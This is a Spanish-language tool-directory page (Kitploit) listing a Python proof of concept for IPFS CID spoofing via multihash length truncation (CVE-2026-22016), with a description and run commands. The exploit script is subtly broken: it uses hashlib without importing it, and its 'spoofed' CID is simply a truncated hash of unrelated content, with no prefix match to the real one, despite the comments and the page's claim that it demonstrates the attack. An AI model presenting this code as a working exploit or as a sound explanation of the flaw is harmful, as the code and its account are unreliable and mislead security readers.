Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-22016-IPFS-CID-Spoofing-via-Multihash-Length-Extension — Prueba de concepto en Python que demuestra la suplantación de CID en IPFS mediante extensión de longitud de multihash, resaltando fallas de verificación del direccionamiento por contenido que pueden envenenar los gateways de IPFS. | Kitploit
Herramientas/GitHubGitHub/george0papasotiriou/cve-2026-22016-ipfs-cid-spoofing-via-multihash-length-extension
Análisis de VulnerabilidadesExplotaciónAnálisis de HashSeguridad WebCriptografíaAtaque Adversario
GitHubgeorge0papasotiriou/cve-2026-22016-ipfs-cid-spoofing-via-multihash-length-extension

CVE-2026-22016-IPFS-CID-Spoofing-via-Multihash-Length-Extension

Prueba de concepto en Python que demuestra la suplantación de CID en IPFS mediante extensión de longitud de multihash, resaltando fallas de verificación del direccionamiento por contenido que pueden envenenar los gateways de IPFS.

Ver Repositorio
7hace 1 mesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-22016 – Suplantación de CID en IPFS mediante extensión de la longitud del multihash

Código del programa (Python)

root@kitploit:~
# ipfs_cid_spoof.py - Generates a CID with a different multihash length
import multihash, cid
# Attacker creates a file whose hash, when truncated, matches a different file's prefix
original_content = b"hello"
fake_content = b"hello world"
real_cid = cid.make_cid(1, 'dag-pb', multihash.encode(hashlib.sha256(original_content).digest(), 'sha2-256'))
# Spoofed CID: we can craft a multihash with a shorter length that matches the start of the real one
spoofed_multihash = multihash.encode(hashlib.sha256(fake_content).digest()[:16], 'sha2-256', length=16)
spoofed_cid = cid.make_cid(1, 'dag-pb', spoofed_multihash)
print(f"Real CID: {real_cid}")
print(f"Spoofed CID: {spoofed_cid}")
# If IPFS node only checks prefix, it may serve the wrong content.

CVE-2026-22016 – Suplantación de CID en IPFS mediante extensión de la longitud del multihash

Severity: High

Descripción general

Una implementación de IPFS confía en el campo de longitud del multihash de un CID sin verificar que el hash en sí coincida con el contenido completo. Un atacante puede crear un archivo cuyo hash truncado sea igual al prefijo del hash de un archivo legítimo y servir el archivo malicioso bajo el mismo CID.

Detalles de la vulnerabilidad

  • Tipo: Suplantación de contenido
  • Impacto: Servir contenido malicioso, envenenando las pasarelas de IPFS.
  • Causa raíz: La verificación del CID no comprueba que la longitud del resumen coincida con la salida esperada de la función hash.

Demostración del exploit

Ejecuta el script:

root@kitploit:~
pip install py-multihash py-cid
python ipfs_cid_spoof.py

Esto demuestra que se puede generar un CID suplantado.

Descargar herramienta